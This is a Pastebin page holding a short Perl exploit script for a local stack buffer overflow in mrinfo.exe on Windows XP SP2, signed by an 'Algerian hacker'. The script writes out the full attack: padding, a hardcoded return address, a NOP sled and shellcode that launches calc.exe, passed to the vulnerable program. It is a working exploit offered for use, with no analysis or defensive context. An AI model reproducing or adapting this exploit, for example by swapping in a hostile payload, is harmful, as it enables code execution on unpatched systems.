Advertisement
Stalk3r

Exploit MRINFO XP SP2

Jul 16th, 2013
122
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 0.67 KB | None | 0 0
  1. #!/usr/bin/perl
  2. ## -----------------------------------------
  3. ## [Write By STALKER]
  4. ## [AlgEriAn HaCkEr]
  5. ## Mrinfo Local Stack Overflow XP SP2
  6. ## Email: Stalk3r@live.com
  7. ## Date: 02/01/2010
  8. ## -----------------------------------------
  9.  
  10. $junk ="\x41"x 56;
  11. $ret ="\x9C\x1A\xDC\x77";
  12. $nop ="\x90"x 200;
  13.  
  14. $shellcode =
  15. "\xeb\x16\x5b\x31\xc0\x50\x53\xbb".
  16. "\x8d\x15\x86\x7c\xff\xd3\x31\xc0".
  17. "\x50\xbb\xea\xcd\x81\x7c\xff\xd3".
  18. "\xe8\xe5\xff\xff\xff\x63\x61\x6c".
  19. "\x63\x2e\x65\x78\x65";
  20.  
  21. $exploit=$junk.$ret.$nop.$shellcode;
  22. print "[ * ]Payload Created...\n";
  23. print "[ * ]Injecting Payload...\n";
  24. print "[ * ]w0w , Good Shell...\n";
  25. system("mrinfo.exe",$exploit);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement